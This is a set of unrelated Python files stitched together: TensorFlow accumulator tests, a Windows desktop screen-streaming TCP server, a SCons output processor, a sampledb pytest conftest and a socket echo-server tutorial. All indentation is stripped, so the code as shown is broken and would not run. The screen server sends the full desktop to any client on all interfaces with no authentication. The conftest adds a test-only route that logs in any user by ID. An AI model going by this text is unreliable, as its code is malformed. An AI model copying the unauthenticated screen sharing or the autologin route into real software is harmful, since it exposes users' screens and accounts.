tf.float32, name="Q", shape=tf.TensorShape([1]))
local_steps = range(1000, 1005)
accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
for ls in local_steps:
set_global_step_op = q.set_global_step(ls)
set_global_step_op.run()
for accum_op in accum_ops:
accum_op.run()
takeg_t = q.take_grad(1)
val = takeg_t.eval()
self.assertEqual(0.0 + sum(x for x in local_steps
if x >= ls) / sum(1 for x in local_steps
if x >= ls), val)
def testParallelApplyGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
def apply_grad(accum_op):
sess.run(accum_op)
threads = [self.checkedThread(
target=apply_grad, args=(o,)) for o in accum_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = takeg_t.eval()
self.assertEqual(val, sum(elems) / len(elems))
def testParallelTakeGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [e for e in range(10)]
accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
takeg_t = q.take_grad(1)
def apply_grad():
for accum_op in accum_ops:
time.sleep(1.0)
sess.run(accum_op)
apply_grad_thread = self.checkedThread(target=apply_grad)
results = []
def take_grad():
results.append(sess.run(takeg_t))
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_grad_thread.start()
for thread in threads:
thread.join()
apply_grad_thread.join()
self.assertItemsEqual(elems, results)
def testAccumulatorApplyAndBlockingTake(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(3)
def apply_grad():
time.sleep(1.0)
for accum_op in accum_ops:
sess.run(accum_op)
return_array = []
def take_grad():
return_array.append(sess.run(takeg_t))
accum_thread = self.checkedThread(target=apply_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self.assertEqual([elems_ave], return_array)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("TakeGrad operation was cancelled"):
sess.run(takeg_op)
def testAccumulatorCancel(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
takeg_t = q.take_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
if __name__ == "__main__":
tf.test.main()
|
server.py
|
# -*- coding: utf-8 -*-
import socket
from threading import Thread
from zlib import compress
import binascii
from mss import mss
from PIL import Image
import numpy as np
#import grab_screen
import numpy
import sys
#import pygame
import win32gui, win32ui, win32con, win32api
import cv2
import time
import php
import ctypes
import hashlib
import copy
import base64
import bson
import json
import io
def md5(data):
m = hashlib.md5()
m.update(data)
h = m.hexdigest()
return h
def imgEncodeDecode(in_imgs, ch, quality=5):
# https://qiita.com/ka10ryu1/items/5fed6b4c8f29163d0d65
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]
result, encimg = cv2.imencode('.jpg', in_imgs, encode_param)
if False == result:
print('could not encode image!')
exit()
decimg = cv2.imdecode(encimg, ch)
return decimg
my = php.kit()
WIDTH = 1024
HEIGHT = 768
hwin = win32gui.GetDesktopWindow()
hwindc = win32gui.GetWindowDC(hwin)
srcdc = win32ui.CreateDCFromHandle(hwindc)
memdc = srcdc.CreateCompatibleDC()
bmp = win32ui.CreateBitmap()
play_one = 0
grab_width = ""
grab_height = ""
grab_left = ""
grab_top = ""
is_first_time = 1
merge_send = []
max_merge = 3
is_new = True
encode_param = [int(cv2.IMWRITE_PNG_COMPRESSION ), 3]
client_server_addr = ""
address = ""
udp_server = ""
sct = mss()
def grab_screen(region=None):
global hwin
global hwindc
global srcdc
global memdc
global bmp
global play_one
global grab_width
global grab_height
global grab_left
global grab_top
global sct
#if region:
# left,top,x2,y2 = region
# width = x2 - left + 1
# height = y2 - top + 1
#else:
if play_one==0:
grab_width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
grab_height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
grab_left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
grab_top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
bmp.CreateCompatibleBitmap(srcdc, grab_width, grab_height)
memdc.SelectObject(bmp)
play_one = 1
'''
memdc.BitBlt((0, 0), (grab_width, grab_height), srcdc, (grab_left, grab_top), win32con.SRCCOPY)
#print(width)
#print(height)
signedIntsArray = bmp.GetBitmapBits(True)
img = np.fromstring(signedIntsArray, dtype='uint8')
img.shape = (grab_height,grab_width,4)
#img.shape = (HEIGHT,WIDTH,4)
#srcdc.DeleteDC()
#memdc.DeleteDC()
#win32gui.ReleaseDC(hwin, hwindc)
#win32gui.DeleteObject(bmp.GetHandle())
'''
monitor = {"top": grab_top, "left": grab_left, "width": grab_width, "height": grab_height}
sct_img = sct.grab(monitor)
img = numpy.array(sct_img)
return cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)
#return img[:,:,::-1]
def to_bytes(self, length, byteorder='big'):
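    # Stand-in for int.to_bytes(): `self` here is the integer value itself, not an instance.
    # Converts it via its hex representation to at most `length` bytes; only the 'big' byte
    # order is exercised by the calls below.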
try:
ch = '>' if byteorder.startswith('b') else '<'
hex_str = '%x' % int(self)
n = len(hex_str)
x = binascii.unhexlify(hex_str.zfill(n + (n & 1)))
val = x[-1 * length:] if ch == '>' else x[:length]
except OverflowError:
raise ValueError(self)
return val
def send_data(conn,bytes_size_len,size_bytes,pixels):
#udp_server.sendto(pixels, address)
conn.send(bytes_size_len)
conn.send(size_bytes)
conn.sendall(pixels)
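# Wire protocol used below: for every message the server first sends one byte giving the length
# (in bytes) of the big-endian payload-size field, then the size itself, then the payload.
# The first payload is the JSON screen-layout info terminated by "WTF_____WTF"; afterwards each
# screen tile is sent as "x,y" + "WTF|||||WTF" + raw pixel bytes (pixels omitted if the tile is
# unchanged), with up to max_merge tiles packed into one payload separated by "MERGE|||MERGE".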
def retreive_screenshot(conn):
#with mss() as sct:
# The region to capture
global is_first_time
global is_new
global encode_param
user32 = ctypes.windll.user32
screen_width=user32.GetSystemMetrics(0)
screen_height=user32.GetSystemMetrics(1)
#screen_width=1024
#screen_height=768
cut_width_counts = 1
cut_height_counts = 2
one_width = int(screen_width / cut_width_counts)
one_height = int(screen_height / cut_height_counts)
#rect = {'top': 0, 'left': 0, 'width': WIDTH, 'height': HEIGHT}
orin_img_md5 = []
data = {
"info":{
"server_width":screen_width,
"server_height":screen_height,
"cuts_x":cut_width_counts,
"cuts_y":cut_height_counts,
"one_width":one_width,
"one_height":one_height
}
}
#print(one_width)
#print(one_height)
for i in range(0,max_merge):
merge_send.append("")
for i in range(0,cut_width_counts*cut_height_counts):
#data["img_data"].append("")
orin_img_md5.append("")
merge_step = 0
while 'recording':
# Capture the screen
#sct_img = sct.grab(sct.monitors[0])
# Tweak the compression level here (0-9)
#img = img.resize((320,240),Image.ANTIALIAS)
#img.rgb.resize((320,240),Image.ANTIALIAS)
#img = Image.frombytes('RGB', sct_img.size, sct_img.rgb)
#img = img.resize((WIDTH, HEIGHT), resample=Image.LANCZOS)
#img = ""
#try:
img = grab_screen()
#img = cv2.imencode('.jpeg', img,encode_param)[1]
#nparr = np.fromstring(cut_img, np.uint8)
#img = cv2.imdecode(img, cv2.IMREAD_COLOR)
#img = imgEncodeDecode(img,cv2.IMREAD_COLOR, 85)
#except:
# continue
#img = img.resize((WIDTH, HEIGHT), resample=Image.LANCZOS)
#img = cv2.resize(img, (data["info"]["new_w"],data["info"]["new_h"]),cv2.INTER_NEAREST )
#is_new = False
#if len(orin_img_data) == 0:
# is_new = True
step=0
if is_first_time == 1:
binary_stream = io.BytesIO()
binary_stream.write(json.dumps(data).encode('ascii'))
binary_stream.write("WTF_____WTF".encode("ascii"))
binary_stream.seek(0)
pixels = binary_stream.read()
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
bytes_size_len = bytes([size_len])
size_bytes = to_bytes(size,size_len,'big')
send_data(conn,bytes_size_len,size_bytes,pixels)
is_first_time = 0
continue
step = 0
for x in range(0,cut_width_counts):
for y in range(0,cut_height_counts):
crop_img = img[one_height*y:one_height*(y+1), one_width*x:one_width*(x+1)]
#crop_img = cv2.resize(crop_img, (one_width,one_height),cv2.INTER_NEAREST )
crop_imgb = crop_img.tobytes()
#IMREAD_COLOR
#crop_imgb = cv2.imencode('.png', crop_img,encode_param)[1].tostring() #, encode_param)[1].tostring()
if is_new == True:
#print("OK3")
#data["img_data"][step]=crop_img
#pixels=pixels+str(crop_imgb)
#binary_stream.write( crop_img.tostring() )
#binary_stream.write("WTF|||||WTF".encode("ascii"))
orin_img_md5[step]=crop_imgb[:-10]
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + crop_imgb
merge_step=merge_step+1
#binary_stream.seek(0)
#binary_stream.write(xy.encode("ascii"))
#binary_stream.write("WTF|||||WTF".encode("ascii"))
#binary_stream.write(crop_imgb)
#binary_stream.seek(0)
#pixels = binary_stream.read()
#size = len(pixels)
#size_len = (size.bit_length() + 7) // 8
#bytes_size_len = bytes([size_len])
#size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
#send_data(conn,bytes_size_len,size_bytes,pixels)
else:
if crop_imgb[:-10] != orin_img_md5[step]:
#print("OK2")
#data["img_data"][step]=crop_img
#pixels=pixels+str(crop_imgb)
#binary_stream.write( crop_img.tostring() )
#binary_stream.write("WTF|||||WTF".encode("ascii"))
#orin_img_md5[step]=md5(crop_imgb)
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + crop_imgb
merge_step = merge_step + 1
orin_img_md5[step]=crop_imgb[:-10]
#pixels = binary_stream.read()
#size = len(pixels)
#size_len = (size.bit_length() + 7) // 8
#bytes_size_len = bytes([size_len])
#size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
#send_data(conn,bytes_size_len,size_bytes,pixels)
else:
#print("OK1")
xy = "%d,%d" % (x , y)
merge_send[merge_step] = xy.encode("ascii")
merge_send[merge_step] = merge_send[merge_step] + "WTF|||||WTF".encode("ascii")
merge_step = merge_step + 1
#data["img_data"][step]=""
#pixels=pixels+""
#binary_stream.write("WTF|||||WTF".encode("ascii"))
step=step+1
if merge_step >= max_merge:
merge_step=0
binary_stream = io.BytesIO()
for i in range(0,max_merge):
binary_stream.write( merge_send[i] )
if i != max_merge-1:
binary_stream.write( b"MERGE|||MERGE" )
binary_stream.seek(0)
pixels = binary_stream.read()
size = len(pixels)
size_len = (size.bit_length() + 7) // 8
bytes_size_len = bytes([size_len])
size_bytes = to_bytes(size,size_len,'big')
#conn.send(bytes([size_len]))
#conn.send(size_bytes)
#conn.sendall(pixels)
send_data(conn,bytes_size_len,size_bytes,pixels)
is_new = False
# binary_stream.seek(0)
# pixels = binary_stream.read() #pixels.encode('utf-8')
# # Send the size of the pixels length
# size = len(pixels)
# size_len = (size.bit_length() + 7) // 8
# conn.send(bytes([size_len]))
#
# # Send the actual pixels length
# #size_bytes = size.to_bytes(size_len, 'big')
# size_bytes = to_bytes(size,size_len,'big')
# #print(size_bytes)
# conn.send(size_bytes)
#
# # Send pixels
# conn.sendall(pixels)
# time.sleep(0.017)
def main(host='0.0.0.0', port=5000):
global is_first_time
global client_server_addr
global address
global udp_server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
sock.bind((host, port))
#address = ('0.0.0.0', 5000)
#s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.bind(address)
try:
sock.listen(50)
print('Server started.')
while 'connected':
conn, addr = sock.accept()
is_first_time = 1
print('Client connected IP:', addr)
#client_server_addr = addr
thread = Thread(target=retreive_screenshot, args=(conn,))
thread.start()
#if address =="":
# address = (client_server_addr[0], 5001)
# udp_server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#udp_server.sendto("WTF".encode("ascii"), address)
finally:
sock.close()
if __name__ == '__main__':
main(host='0.0.0.0',port=5000)
|
output_processor.py
|
# Copyright Jamie Allsop 2011-2019
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
#-------------------------------------------------------------------------------
# Output Processor
#-------------------------------------------------------------------------------
import subprocess
import sys
import os
import re
import time
import threading
import shlex
import platform
import logging
import cuppa.timer
from cuppa.colourise import as_colour, as_emphasised, as_highlighted, as_notice
from cuppa.log import logger
from cuppa.utility.python2to3 import as_str, errno, Queue
def command_available( command ):
try:
with open(os.devnull) as devnull:
subprocess.Popen( shlex.split( command ), stdout=devnull, stderr=devnull ).communicate()
except OSError as e:
if e.errno == errno.ENOENT:
return False
return True
class LineConsumer:
def __init__( self, call_readline, processor=None ):
self.call_readline = call_readline
self.processor = processor
def __call__( self ):
try:
for line in iter( self.call_readline, "" ):
line = as_str( line.rstrip() )
if line:
if self.processor:
line = self.processor( line )
if line:
print( line )
else:
print( line )
except UnicodeDecodeError as error:
print( "WARNING: Ignoring unicode error {}".format( error ) )
class IncrementalSubProcess:
@classmethod
def Popen2( cls, stdout_processor, stderr_processor, args_list, **kwargs ):
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
timing_enabled = logger.isEnabledFor( logging.DEBUG )
suppress_output = False
if 'suppress_output' in kwargs:
suppress_output = kwargs['suppress_output']
del kwargs['suppress_output']
use_shell = False
if 'scons_env' in kwargs:
use_shell = kwargs['scons_env'].get_option( 'use-shell' )
del kwargs['scons_env']
try:
process = None
stderr_thread = None
timer = timing_enabled and cuppa.timer.Timer() or None
if timer:
logger.debug( "Command [{}] - Running...".format( as_notice(str(timer.timer_id())) ) )
close_fds = platform.system() == "Windows" and False or True
if not suppress_output:
sys.stdout.write( " ".join(args_list) + "\n" )
process = subprocess.Popen(
use_shell and " ".join(args_list) or args_list,
**dict( kwargs, close_fds=close_fds, shell=use_shell, universal_newlines=True )
)
stderr_consumer = LineConsumer( process.stderr.readline, stderr_processor )
stdout_consumer = LineConsumer( process.stdout.readline, stdout_processor )
stderr_thread = threading.Thread( target=stderr_consumer )
stderr_thread.start()
            stdout_consumer()
stderr_thread.join()
process.wait()
if timer:
timer.stop()
logger.debug( "Command [{}] - Elapsed {}".format( as_notice(str(timer.timer_id())), cuppa.timer.as_string( timer.elapsed() ) ) )
return process.returncode
except Exception as e:
if timer:
timer.stop()
logger.debug( "Command [{}] - Elapsed {}".format( as_notice(str(timer.timer_id())), cuppa.timer.as_string( timer.elapsed() ) ) )
logger.error( "IncrementalSubProcess.Popen2() failed with error [{}]".format( str(e) ) )
if process:
logger.info( "Killing existing POpen object" )
process.kill()
if stderr_thread:
logger.info( "Joining any running threads" )
stderr_thread.join()
raise e
@classmethod
def Popen( cls, processor, args_list, **kwargs ):
return cls.Popen2( processor, processor, args_list, **kwargs )
class PSpawn(object):
def __init__( self, pspawn, sh, escape, cmd, args, env, stdout, stderr ):
self._pspawn = pspawn
self._sh = sh
self._escape = escape
self._cmd = cmd
self._args = args
self._env = env
self._stdout = stdout
self._stderr = stderr
self._exception = None
def __call__( self ):
try:
self._returncode = self._pspawn( self._sh, self._escape, self._cmd, self._args, self._env, self._stdout, self._stderr )
except BaseException:
self._exception = sys.exc_info()
    def returncode( self ):
        if self._exception is not None:
            logger.error("pspawn terminated with exception [{}]".format( str(self._exception) ) )
            # _exception holds sys.exc_info(); re-raise the original exception with its traceback
            raise self._exception[1].with_traceback( self._exception[2] )
        return self._returncode
class Stream(object):
def __init__( self, processor, name ):
self._queue = Queue.Queue()
self._processor = processor
self._name = name
def flush( self ):
pass
def write( self, text ):
logger.trace( "Stream _queue.put [{}]".format( self._name ) )
self._queue.put( text )
def read( self, block ):
try:
logger.trace( "Stream _queue.get [{}]".format( self._name ) )
text = self._queue.get( block )
if text:
for line in text.splitlines():
if self._processor:
line = self._processor( line )
if line:
print( line )
else:
print( line )
self._queue.task_done()
except Queue.Empty:
logger.trace( "Stream Queue.Empty raised [{}]".format( self._name ) )
def join( self ):
if self._queue.empty():
logger.trace( "Stream _queue.empty() - flush with None [{}]".format( self._name ) )
self._queue.put( None )
self._queue.join()
class Reader(object):
def __init__( self, stream, finished ):
self._stream = stream
self._finished = finished
def __call__( self ):
while not self._finished.is_set():
self._stream.read(True)
self._stream.read(False)
class Processor:
def __init__( self, scons_env ):
self.scons_env = scons_env
@classmethod
def install( cls, env ):
global _pspawn
_pspawn = env['PSPAWN']
output_processor = cls( env )
if platform.system() == "Windows":
env['SPAWN'] = output_processor.windows_spawn
else:
env['SPAWN'] = output_processor.posix_spawn
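    # posix_spawn runs the command via IncrementalSubProcess and processes output line by line;
    # windows_spawn instead routes through SCons' PSPAWN hook with Stream/Reader threads so the
    # same per-line processing can be applied to stdout and stderr on Windows.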
def posix_spawn( self, sh, escape, cmd, args, env ):
processor = SpawnedProcessor( self.scons_env )
returncode = IncrementalSubProcess.Popen(
processor,
[ arg.strip('"') for arg in args ],
env=env,
suppress_output=True,
)
summary = processor.summary( returncode )
if summary:
print( summary )
return returncode
def windows_spawn( self, sh, escape, cmd, args, env ):
processor = SpawnedProcessor( self.scons_env )
stdout = Stream( processor, "stdout" )
stderr = Stream( processor, "stderr" )
pspawn = PSpawn( _pspawn, sh, escape, cmd, args, env, stdout, stderr )
pspawn_thread = threading.Thread( target=pspawn )
finished = threading.Event()
pspawn_thread.start()
stdout_thread = threading.Thread( target = Reader( stdout, finished ) )
stdout_thread.start()
stderr_thread = threading.Thread( target = Reader( stderr, finished ) )
stderr_thread.start()
pspawn_thread.join()
logger.trace( "Processor - PSPAWN joined" )
finished.set()
stdout.join()
logger.trace( "Processor - STDOUT stream joined" )
stdout_thread.join()
logger.trace( "Processor - STDOUT thread joined" )
stderr.join()
logger.trace( "Processor - STDERR stream joined" )
stderr_thread.join()
logger.trace( "Processor - STDERR thread joined" )
returncode = pspawn.returncode()
summary = processor.summary( returncode )
if summary:
print( summary )
return returncode
class SpawnedProcessor(object):
def __init__( self, scons_env ):
self._processor = ToolchainProcessor(
scons_env['toolchain'],
scons_env['minimal_output'],
scons_env['ignore_duplicates'] )
def __call__( self, line ):
return self._processor( line )
def summary( self, returncode ):
return self._processor.summary( returncode )
class ToolchainProcessor:
def __init__( self, toolchain, minimal_output, ignore_duplicates ):
self.toolchain = toolchain
self.minimal_output = minimal_output
self.ignore_duplicates = ignore_duplicates
self.errors = 0
self.warnings = 0
self.start_time = time.time()
self.error_messages = {}
self.warning_messages = {}
self.ignore_current_message = False
def filtered_duplicate( self, line, existing_messages ):
if self.ignore_duplicates and line in existing_messages:
existing_messages[line] +=1
self.ignore_current_message = True
return None
else:
self.ignore_current_message = False
existing_messages[line] = 1
return line
def filtered_line( self, line=None, meaning=None ):
if meaning == "error":
return self.filtered_duplicate( line, self.error_messages )
if meaning == "warning":
return self.filtered_duplicate( line, self.warning_messages )
if self.minimal_output or self.ignore_current_message:
return None
else:
return line
def __call__( self, line ):
( matches, interpretor, error_id, warning_id ) = self.interpret( line )
if matches:
highlights = interpretor['highlight']
display = interpretor['display']
meaning = interpretor['meaning']
file = interpretor['file']
message = ''
for match in display:
element = matches.group( match )
if match == file and ( meaning == 'error' or meaning == 'warning' ):
element = self.normalise_path( element )
element = as_colour( meaning, element )
if match in highlights:
element = as_emphasised( element )
message += element
message = self.filtered_line( message + "\n", meaning )
if meaning == 'error':
if message:
message = as_highlighted( meaning, " = Error " + str(error_id) + " = ") + "\n" + message
else:
self.errors -= 1
elif meaning == 'warning':
if message:
message = as_highlighted( meaning, " = Warning " + str(warning_id) + " = ") + "\n" + message
else:
self.warnings -= 1
return message
return self.filtered_line( line )
def normalise_path( self, file_path ):
normalised_path = file_path
if os.path.exists( file_path ):
normalised_path = os.path.relpath( os.path.realpath( file_path ) )
# if normalised_path[0] != '.' and normalised_path[0] != os.path.sep:
# normalised_path = '.' + os.path.sep + normalised_path
# return os.path.abspath( normalised_path )
return normalised_path
def interpret( self, line ):
Interpretors = self.toolchain.output_interpretors()
for interpretor in Interpretors:
Regex = interpretor['regex']
Matches = re.match( Regex, line )
if Matches:
error_id = 0
warning_id = 0
if interpretor['meaning'] == 'error':
self.errors += 1
error_id = self.errors
elif interpretor['meaning'] == 'warning':
self.warnings += 1
warning_id = self.warnings
return ( Matches, interpretor, error_id, warning_id, )
return ( None, None, None, None, )
def summary( self, returncode ):
elapsed_time = time.time() - self.start_time
Summary = ''
if returncode:
Summary += as_highlighted( 'summary', " === Process Terminated with status " + str(returncode) + " (Elapsed " + str(elapsed_time) + "s)" + " === ") + "\n"
if self.errors:
Summary += as_highlighted( 'error', " === Errors " + str(self.errors) + " === ")
if self.warnings:
Summary += as_highlighted( 'warning', " === Warnings " + str(self.warnings) + " === ")
return Summary
|
conftest.py
|
# coding: utf-8
"""
"""
import getpass
import copy
import logging
import os
import random
import threading
import time
import cherrypy
import flask
import flask_login
import pytest
import requests
import sqlalchemy
import sampledb
import sampledb.utils
import sampledb.config
sampledb.config.MAIL_SUPPRESS_SEND = True
sampledb.config.TEMPLATES_AUTO_RELOAD = True
sampledb.config.SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://{0}:@localhost:5432/{0}'.format(getpass.getuser())
sampledb.config.MAIL_SENDER = 'sampledb@example.com'
sampledb.config.MAIL_SERVER = 'mail.example.com'
sampledb.config.CONTACT_EMAIL = 'sampledb@example.com'
sampledb.config.JUPYTERHUB_URL = 'example.com'
sampledb.config.LDAP_NAME = 'LDAP'
sampledb.config.TESTING_LDAP_UNKNOWN_LOGIN = 'unknown-login-for-sampledb-tests'
sampledb.config.TESTING_LDAP_WRONG_PASSWORD = 'wrong-password-for-sampledb-tests'
sampledb.config.FEDERATION_UUID = 'aef05dbb-2763-49d1-964d-71205d8da0bf'
# restore possibly overridden configuration data from environment variables
sampledb.config.use_environment_configuration(env_prefix='SAMPLEDB_')
def create_flask_server(app):
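    # Host the Flask app with CherryPy in a daemon thread on a random local port, and expose a
    # POST /shutdown route so the session-scoped fixture can stop the server when tests finish.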
if not getattr(app, 'has_shutdown_route', False):
@app.route('/shutdown', methods=['POST'])
def shutdown():
cherrypy.engine.exit()
return 'Server shutting down...'
app.has_shutdown_route = True
def run_server():
cherrypy.engine.start()
cherrypy.engine.block()
app.debug = True
port = random.randint(10000, 20000)
cherrypy.tree.graft(app, '/')
cherrypy.config.update({
'environment': 'test_suite',
'server.socket_host': '127.0.0.1',
'server.socket_port': port,
'server.socket_queue_size': 20,
'log.screen': True
})
server_thread = threading.Thread(target=run_server, daemon=True)
server_thread.start()
server_thread.app = app
server_thread.initial_config = copy.deepcopy(server_thread.app.config)
server_thread.base_url = 'http://localhost:{0}/'.format(port)
server_thread.api_url = server_thread.base_url + 'api/'
# short delay to allow the web server to start
time.sleep(0.1)
yield server_thread
# restore initial configuration
server_thread.app.config = server_thread.initial_config
r = requests.post(server_thread.base_url + 'shutdown')
assert r.status_code == 200
server_thread.join()
@pytest.fixture(scope='session')
def flask_server(worker_id):
if worker_id != 'master':
sampledb.config.SQLALCHEMY_DATABASE_URI = "postgresql+psycopg2://postgres:@postgres:5432/testdb_" + worker_id[2:]
sampledb.config.FILE_STORAGE_PATH = sampledb.config.FILE_STORAGE_PATH + worker_id[2:] + '/'
app = create_app()
# empty the database first, to ensure all tests rebuild it before use
if worker_id != 'master':
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
else:
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=False)
yield from create_flask_server(app)
def create_app():
logging.getLogger('flask.app').setLevel(logging.WARNING)
os.environ['FLASK_ENV'] = 'development'
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb_app = sampledb.create_app()
sampledb_app.config['TESTING'] = True
@sampledb_app.route('/users/me/loginstatus')
def check_login():
return flask.jsonify(flask_login.current_user.is_authenticated)
@sampledb_app.route('/users/<int:user_id>/autologin')
def autologin(user_id):
user = sampledb.models.User.query.get(user_id)
assert user is not None
flask_login.login_user(user)
return ''
return sampledb_app
@pytest.fixture
def app(flask_server):
app = flask_server.app
# reset config and database before each test
app.config = copy.deepcopy(flask_server.initial_config)
sampledb.utils.empty_database(sqlalchemy.create_engine(sampledb.config.SQLALCHEMY_DATABASE_URI), only_delete=True)
sampledb.setup_database(app)
# enable german language for input by default during testing
with app.app_context():
german = sampledb.logic.languages.get_language_by_lang_code('de')
sampledb.logic.languages.update_language(
language_id=german.id,
names=german.names,
lang_code=german.lang_code,
datetime_format_datetime=german.datetime_format_datetime,
datetime_format_moment=german.datetime_format_moment,
enabled_for_input=True,
enabled_for_user_interface=german.enabled_for_user_interface
)
return app
@pytest.fixture(autouse=True)
def app_context(app):
with app.app_context():
# yield to keep the app context active until the test is done
yield None
|
server.py
|
#!/usr/bin/env python3
#
# https://docs.python.org/3.5/library/socket.html
#
import socket
import threading
import time
# --- constants ---
HOST = '' # local address IP (not external address IP)
            # '0.0.0.0' or '' - connection on all NICs (Network Interface Card),
            # '127.0.0.1' or 'localhost' - local connection only (can't connect from a remote computer)
# 'local_IP' - connection only on one NIC which has this IP
PORT = 8000 # local port (not external port)
# --- functions ---
def handle_client(conn, addr):
try:
while True:
# --- receive/send data ---
# if client first `send()` and next `recv()`
# then server have to first `recv`() and next `send()`
# if both will `recv()` at the same time then all will hang
# because both will wait for data and nobody will `send()`
# if you don't use native characters
# then you can use 'ascii' instead of 'utf-8'
now = int(time.time())
# receiving
data = conn.recv(1024)
text = data.decode('utf-8') # decode bytes to string
print('[{}][{}] recv: {}'.format(addr, now, text))
# sending
text = 'Thank you [{}]'.format(now)
data = text.encode('utf-8') # encode string to bytes
conn.send(data)
            print('[{}][{}] send: {}'.format(addr, now, text))
except Exception as e:
print('[DEBUG] exception:', e)
# --- create socket ---
print('[DEBUG] create socket')
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = socket.socket() # default value is (socket.AF_INET, socket.SOCK_STREAM)
# so you don't have to use it in socket()
# --- options ---
print('[DEBUG] set options')
# solution for "[Error 89] Address already in use". Use before bind()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# --- assign socket to local IP (local NIC) ---
print('[DEBUG] bind:', (HOST, PORT))
s.bind((HOST, PORT)) # one tuple (HOST, PORT), not two arguments
# --- set size of queue ---
print('[DEBUG] listen')
s.listen(1) # number of clients waiting in queue for "accept".
# If queue is full then client can't connect.
while True:
# --- accept client ---
# accept client and create new socket `conn` (with different port) for this client only
# and server will can use `s` to accept other clients (if you will use threading)
print('[DEBUG] accept ... waiting')
conn, addr = s.accept()
print('[DEBUG] addr:', addr)
# --- run thread ---
t = threading.Thread(target=handle_client, args=(conn, addr))
t.start()
# --- close all sockets ---
# always first close `conn`, next close `s`
# (with the infinite accept loop above, this cleanup is not reached in normal operation)
print('[DEBUG] close socket(s)')
conn.close()
s.close()
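# A minimal matching client, as an illustrative sketch (not part of the original example);
# it sends first and then receives, mirroring the recv/send order documented above:
#
#   import socket
#   c = socket.socket()
#   c.connect(('127.0.0.1', 8000))
#   c.send('hello'.encode('utf-8'))        # client sends first ...
#   print(c.recv(1024).decode('utf-8'))    # ... then waits for the server's reply
#   c.close()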
|